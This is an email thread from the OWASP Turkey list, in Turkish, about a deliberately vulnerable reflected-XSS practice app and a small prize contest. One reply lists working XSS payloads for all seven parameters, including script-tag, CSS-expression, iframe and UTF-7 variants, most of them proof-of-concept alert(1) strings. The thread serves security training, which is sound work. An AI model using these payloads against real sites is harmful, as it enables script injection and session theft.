Selamlar,<br><br><br>benim default ayarlarla denedigim birkac arac da bazilarini bulamadi. Bu aslinda otomatize araclarin/yontemlerin ne kadar efektif olabilecegini gostermesi acisindan onemli bir calisma. <br><br>Ama buradaki xss&#39;lerin gunumuz uygulamalarinda bulunma orani da cok onemli. Yani %1 bulunacak bir ihtimal icin bir dunya ek calisma yapmak istemiyordur arac yazarlari.<br>

<br><br><br clear="all">---<br>Huzeyfe ONAL  <br>Ag Guvenligi Listesine uye oldunuz mu?<br><a href="http://blog.lifeoverip.net/netsec-listesi/">http://blog.lifeoverip.net/netsec-listesi/</a><br> <br>---<br>
<br><br><div class="gmail_quote">2009/6/16 Bedirhan Urgun <span dir="ltr">&lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;</span><br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">

<div>tesekkurler Sertan. Tebrik ederim, referansli aciklamalarin ozellikle cok faydali. Cagdas ile adreslerinizi bana ozel gonderebilirseniz hediyeleri gonderecegim.</div>
<div> </div>
<div>Bu arada hepsini bulan (false-positive olmayacak sekilde) otomatik uygulama varsa bildiginiz merak ediyorum. Benim denediklerim de mutlaka 1-2 (hatta bazen 3) eksik cikiyor.<br></div>
<div> </div>
<div class="gmail_quote">16 Haziran 2009 Salı 00:23 tarihinde Sertan Kolat <span dir="ltr">&lt;<a href="mailto:sertan@mlists.olympos.org" target="_blank">sertan@mlists.olympos.org</a>&gt;</span> yazdı:<div><div></div><div class="h5">

<br>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>
<p><span>Merhaba,</span></p>
<p><span><br></span></p>
<p><span>Cok guzel uygulama, elinize saglik. </span></p>
<p><span><br></span></p>
<p><span>1) (FF3) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=</a>&lt;script&gt;alert(1)&lt;/script&gt;a</span></p>
<p><span>2) (FF3) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector2=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector2=</a>&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;a</span></p>



<p><span>3) (IE6) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url%28javascript:alert%281%29%29" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))</a></span></p>



<p><span>veya (IE8) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression%28alert%281%29%29" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1))</a>;</span></p>



<p><span>4) (FF3) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert%281%29;%3C/script%3E" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E</a></span></p>



<p><span>5) (FF3) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert%281%29%3E" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E</a></span></p>



<p><span>6) (IE7, encoding auto-select[1]) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert%281%29%2bADw-%2fscript%2bAD4-" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-</a></span></p>



<p><span>7) (IE6) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url%28javascript:alert%281%29%29" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))</a></span></p>



<p><span><br></span></p>
<p><span><br></span></p>
<p><span>[1] IE charset encoding Auto-Selection:</span></p>
<p><span>If &#39;Encoding&#39; is set to &#39;Auto-Select&#39;, and Internet-Explorer finds a UTF-7 string in the first 4096 characters of the response&#39;s body, it will set the charset encoding to UTF-7 automatically, unless a certain charset encoding is already enforced. </span></p>



<p><span><br></span></p><font color="#888888">
<p><span><br></span></p>
<p><span>Sertan Kolat</span></p></font>
<div>
<div></div>
<div>
<p><br></p>
<p><span>On Monday, June 15, 2009, 1:06:17 PM, you wrote:</span></p>
<div>
<table style="background-color: rgb(255, 255, 255);" border="0" cellpadding="1" cellspacing="2">
<tbody>
<tr valign="top">
<td style="background-color: rgb(0, 0, 255);" width="1"><br></td>
<td width="776">
<p><span>Merhaba,</span></p>
<p><span>Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir &quot;oyun grubu&quot; uygulamasına </span><a href="http://www.webguvenligi.org/xsstb/reflected.php" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php</a><span> erişebilirsiniz.</span></p>



<p><span>Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all olarak asagida verdigim link gibi gonderen ilk iki kisye;</span></p>



<p><span> </span></p>
<p><span>1inciye Maldivler&#39;e 2 kisilik 7 gun 7 gece seyehat</span></p>
<p><span>2inciye Son model araba   </span></p>
<p><span> </span></p>
<p><span>Yok daha neler!... </span></p>
<p><span> </span></p>
<p><span>1inciye OWASP Membership T-Shirt&#39;u (L)</span></p>
<p><span>2inciye OWASP Membership DVD&#39;si</span></p>
<p><span> </span></p>
<p><span>gonderecegim.</span></p>
<p><span> </span></p>
<p><span>Ornek; (birinci tuyo benden)</span></p>
<p><a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert%281%29%3C/script%3E" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E</a></p>


<p><span> </span></p>
<p><span> </span></p>
<p><span>Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli</span></p>
<p><span>Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi</span></p>
<p><span>Not 3: en son yazdigim hediyeler gecerli! sonra &quot;vay ben gormedim&quot; olmasin</span></p>
<p><span> </span></p>
<p><span>Proje Post&#39;u: </span><a href="http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html" target="_blank">http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html</a></p>
<p><span>-- </span></p>
<p><span>Bedirhan Urgun</span></p>
<p><a href="http://www.webguvenligi.org/" target="_blank">http://www.webguvenligi.org</a></p>
<p><a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a></p>
<p><br></p>
<p><span>Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için: </span></p>
<p><a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a></p></td></tr></tbody></table></div></div></div></div></blockquote></div></div></div>

<br><br clear="all">

<div></div><br>-- <br><div><div></div><div class="h5">Bedirhan Urgun<br><a href="http://www.webguvenligi.org" target="_blank">http://www.webguvenligi.org</a><br><a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a><br>

<br>Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için: <br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
</div></div><br>_______________________________________________<br>
Owasp-turkey mailing list<br>
<a href="mailto:Owasp-turkey@lists.owasp.org">Owasp-turkey@lists.owasp.org</a><br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
<br></blockquote></div><br>